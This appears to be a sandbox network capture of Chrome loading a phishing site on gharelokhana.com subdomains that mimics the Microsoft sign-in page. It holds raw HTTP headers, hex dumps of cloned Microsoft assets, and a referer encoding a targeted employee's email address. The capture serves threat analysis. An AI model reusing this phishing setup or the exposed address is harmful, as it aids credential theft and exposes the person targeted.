                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                40192.168.2.549922164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:29 UTC554OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:29 UTC806INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:29 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                etag: 0x8DB5C3F4911527F
                                                x-ms-request-id: ef403846-601e-007d-14db-44b275000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072429Z-16c5c9558c6xg55xhC1DUSey8w000000078000000000kd7a
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:29 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                                Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                                2024-12-05 07:24:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                41192.168.2.549923164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:29 UTC553OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:29 UTC800INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:29 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:46 GMT
                                                etag: 0x8DB5C3F47E260FD
                                                x-ms-request-id: 8f25bc91-001e-0057-738c-4652c8000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072429Z-15d6f6465c8wbqgkhC1DUS8p6c00000000f0000000003p8w
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:29 UTC680INData Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01
                                                Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9
                                                2024-12-05 07:24:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                42192.168.2.549925164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:29 UTC540OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:29 UTC758INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:29 GMT
                                                Content-Type: image/x-icon
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                etag: 0x8D8731230C851A6
                                                x-ms-request-id: ee9927f2-801e-0038-66d9-446796000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072429Z-16c5c9558c6xg55xhC1DUSey8w000000077g00000000pbnf
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                2024-12-05 07:24:29 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                                Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                                2024-12-05 07:24:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                43192.168.2.549926164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:29 UTC825OUTGET /sbo.co.at/winauth/ssoprobe?client-request-id=a1e188a0-68bf-4354-b37c-5c94feca2ce3&_=1733383463857 HTTP/1.1
                                                Host: 8cacc656-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                44192.168.2.549932164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:30 UTC1498OUTPOST /common/instrumentation/dssostatus HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: keep-alive
                                                Content-Length: 67
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                hpgrequestid: 48c8506e-fbd9-4ec1-ab0c-7ef5b57e4a01
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                client-request-id: a1e188a0-68bf-4354-b37c-5c94feca2ce3
                                                canary: PAQABDgEAAADW6jl31mB3T7ugrWTT8pFe4mjPsW619IYGXQ8Hubgd8r-eLEDmZy2HTrbiYIerXXOY88tgCwp5t_8A3s20LLpyWy7p5LJnIvkDAtT3kXUhatxoR8Xd-AZToHqHkpkqI7v5zIiJxTTeEjGuFzwd1QAqpPZ2pPCfJuaO582y9AfO7m1d9bnKNvePghp1-t7Db4isEXjGocNbQQDpCIX9thxuRyxiGggyuWap4ookIgXxyCAA
                                                Content-type: application/json; charset=UTF-8
                                                hpgid: 1104
                                                Accept: application/json
                                                hpgact: 2101
                                                sec-ch-ua-platform: "Windows"
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=true
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0
                                                2024-12-05 07:24:30 UTC67OUTData Raw: 7b 22 72 65 73 75 6c 74 43 6f 64 65 22 3a 32 2c 22 73 73 6f 44 65 6c 61 79 22 3a 30 2c 22 6c 6f 67 22 3a 22 50 72 6f 62 65 20 69 6d 61 67 65 20 65 72 72 6f 72 20 65 76 65 6e 74 20 66 69 72 65 64 22 7d
                                                Data Ascii: {"resultCode":2,"ssoDelay":0,"log":"Probe image error event fired"}
                                                2024-12-05 07:24:31 UTC923INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:31 GMT
                                                Content-Type: application/json; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: no-store, no-cache
                                                pragma: no-cache
                                                access-control-allow-origin: https://8cacc656-3c4125ca.gharelokhana.com/
                                                access-control-allow-credentials: true
                                                access-control-allow-methods: POST, OPTIONS
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                client-request-id: a1e188a0-68bf-4354-b37c-5c94feca2ce3
                                                x-ms-request-id: 5a040b7a-a9f6-47cd-acd1-15028baa0800
                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                2024-12-05 07:24:31 UTC272INData Raw: 31 30 39 0d 0a 7b 22 61 70 69 43 61 6e 61 72 79 22 3a 22 50 41 51 41 42 44 67 45 41 41 41 44 57 36 6a 6c 33 31 6d 42 33 54 37 75 67 72 57 54 54 38 70 46 65 61 48 77 51 73 36 38 52 39 39 69 68 6d 36 6e 64 71 4a 43 45 78 34 48 56 48 5f 74 67 70 79 53 39 71 43 76 6c 59 57 6e 52 6e 4a 6f 76 63 55 57 62 4c 32 4a 39 33 4e 34 68 63 62 2d 56 63 76 6a 5f 79 4e 6d 64 35 4f 71 6b 64 5a 38 77 61 77 55 45 36 52 69 4f 6d 5f 75 62 44 56 78 33 69 59 73 5f 35 61 6b 4b 59 39 4d 55 2d 4b 6f 6b 41 65 6c 49 4f 79 53 58 49 7a 79 72 63 71 69 41 71 69 38 47 4d 5f 63 78 63 59 65 32 6f 7a 66 67 49 77 66 4d 6e 62 6c 6b 37 39 34 75 2d 63 4d 79 55 64 5a 72 76 44 69 44 59 63 78 6a 70 30 55 76 47 61 74 43 5a 57 68 31 41 66 32 48 57 35 74 58 46 62 66 63 51 38 51 34 56 77 77 78 56 58 42
                                                Data Ascii: 109{"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeaHwQs68R99ihm6ndqJCEx4HVH_tgpyS9qCvlYWnRnJovcUWbL2J93N4hcb-Vcvj_yNmd5OqkdZ8wawUE6RiOm_ubDVx3iYs_5akKY9MU-KokAelIOySXIzyrcqiAqi8GM_cxcYe2ozfgIwfMnblk794u-cMyUdZrvDiDYcxjp0UvGatCZWh1Af2HW5tXFbfcQ8Q4VwwxVXB
                                                2024-12-05 07:24:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                45192.168.2.549933164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:31 UTC805OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:32 UTC800INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:32 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:49 GMT
                                                etag: 0x8DB5C3F49ED96E0
                                                x-ms-request-id: 48635b47-101e-0074-558c-46c80b000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072432Z-15d6f6465c82bjp6hC1DUSpn0g000000014000000000tb3b
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:32 UTC628INData Raw: 32 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b
                                                Data Ascii: 26d}UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;
                                                2024-12-05 07:24:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                46192.168.2.549934164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:31 UTC766OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:32 UTC812INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:32 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 35203
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Thu, 15 Aug 2024 17:52:55 GMT
                                                etag: 0x8DCBD5317AEB807
                                                x-ms-request-id: b3099380-201e-0022-689b-4639e4000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072431Z-15d6f6465c8qxjgbhC1DUSs9xw00000001mg000000002832
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:32 UTC6408INData Raw: 1f 8b 08 00 00 00 00 00 00 03 c4 bd 6b 43 db 48 b2 30 fc fd f9 15 e0 9d 65 ac b5 00 df 30 18 70 58 06 92 49 76 33 93 9c 5c 66 cf 2e 30 59 59 96 6d 0d b2 65 24 99 4b 02 cf 6f 7f eb d2 97 6a c9 90 cc 9c 67 df 33 e7 6c 70 57 df aa ab ab ab ab aa ab 5b db 7f 59 ff 3f 6b 7f 59 db fc f6 ff d6 de 7f 38 7e f7 61 ed cd 8b b5 0f 2f 5f bd 3b 5d 7b 0b a9 7f ae fd fc e6 c3 ab 93 e7 df de 0e 76 8a ff fb 30 8d f3 b5 71 9c 44 6b f0 77 18 e4 d1 68 2d 9d af a5 d9 5a 3c 0f d3 6c 91 66 41 11 e5 6b 33 f8 37 8b 83 64 6d 9c a5 b3 b5 62 1a ad 2d b2 f4 b7 28 2c f2 b5 24 ce 0b a8 34 8c 92 f4 66 ad 0e cd 65 a3 b5 b7 41 56 dc ad bd 7a eb 6d 41 fb 11 b4 16 4f e2 39 d4 0e d3 c5 1d fc 9e 16 6b f3 b4 88 c3 68 2d 98 8f a8 b5 04 12 f3 3c 5a 5b ce 47 51 b6 76 33 8d c3 e9 da 4f 71 98 a5 79
                                                Data Ascii: kCH0e0pXIv3\f.0YYme$Kojg3lpW[Y?kY8~a/_;]{v0qDkwh-Z<lfAk37dmb-(,$4feAVzmAO9kh-<Z[GQv3Oqy
                                                2024-12-05 07:24:32 UTC16384INData Raw: 43 03 30 ce 45 64 92 bf 4b e3 92 ee 94 5c 3a 90 5d 2a 63 c8 49 8d 58 72 62 f2 ef 65 72 22 2f 5e 96 c9 89 23 b8 c4 77 76 f4 aa a1 9d e7 ef 22 62 12 a9 73 29 22 26 31 fd 77 61 34 e1 42 b8 14 46 13 a6 ff 5e 99 0f 64 c1 cb ca 7c 50 d9 ca 7c d0 68 cb 50 ba 12 92 1c 5b 85 66 84 83 7c 2d dd 01 c4 45 89 03 09 08 e2 46 4f 74 09 86 ef 0d e9 55 d9 a6 96 66 c3 91 99 a5 21 95 11 90 21 43 74 84 dc 2e 1d 23 bc 16 e9 40 e5 9b cb 7f 2d 05 d0 7e 3a ae 92 58 93 70 87 5a 58 00 c2 91 75 24 11 2e 49 a0 ee 40 dd 06 dc 6d 96 a9 e8 b0 56 d4 d5 80 b1 92 07 7d 72 46 88 18 2d b2 60 5e 8b 74 44 94 b3 84 6b aa f2 b6 85 91 82 68 21 ce 2a 20 42 92 85 86 68 4c 16 26 a4 4c 97 31 c6 43 9f 8c 07 04 15 da c6 0e 78 3c 45 10 eb 6a b4 f4 93 63 09 e1 a6 b5 26 a1 7a d2 b1 97 41 30 52 e9 dc 00 8c
                                                Data Ascii: C0EdK\:]*cIXrber"/^#wv"bs)"&1wa4BF^d|P|hP[f|-EFOtUf!!Ct.#@-~:XpZXu$.I@mV}rF-`^tDkh!* BhL&L1Cx<Ejc&zA0R
                                                2024-12-05 07:24:32 UTC12411INData Raw: a0 bc f9 35 9c c5 21 c8 57 6e 14 7c e3 3b c4 d2 ee 24 e2 8e 9e b2 ab ac 4b da fb 56 5e 45 e6 9b 3e 65 82 d9 36 0f c6 b4 0b 59 13 6c ec 1d 8c 2b 26 d8 b8 64 82 79 ea 2e 8a c9 2e 7b c4 45 54 d3 58 2c be 31 46 35 2d ed f2 1b d3 8b e2 14 c0 5e 5f 54 59 3f c4 75 d5 43 63 6a e1 a9 46 6d a4 52 e8 2f 3c df c0 94 a7 3b 44 97 38 70 f7 97 64 c0 f5 8e 5a fb 6d 6b e7 39 43 32 a6 63 8e a6 23 7f ff 6c b4 e2 fb 67 f8 ea 3a cc e3 58 fb a3 dc 57 9e 73 65 3a ea 03 ba f5 04 df 40 73 f7 c3 f1 23 06 a4 5e 60 63 5c 60 c1 d7 17 58 e2 7d cd 49 bb f0 e8 79 10 77 85 05 5f 5b 61 f3 72 a5 cd 16 ed ed 72 35 55 d1 ab ae a6 c4 fb aa 4b 6b 51 d2 e2 a7 76 71 fd a1 c8 4e e1 f1 d2 8b 8b 96 d4 f2 1b 97 14 6d 06 ca bf a1 8c cc 6f 5b 37 21 09 61 bb 6e 40 43 0c 2b eb 26 7c dc 75 11 5a fe 9b 23
                                                Data Ascii: 5!Wn|;$KV^E>e6Yl+&dy..{ETX,1F5-^_TY?uCcjFmR/<;D8pdZmk9C2c#lg:XWse:@s#^`c\`X}Iyw_[arr5UKkQvqNmo[7!an@C+&|uZ#


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                47192.168.2.549943164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:33 UTC699OUTGET /common/instrumentation/dssostatus HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
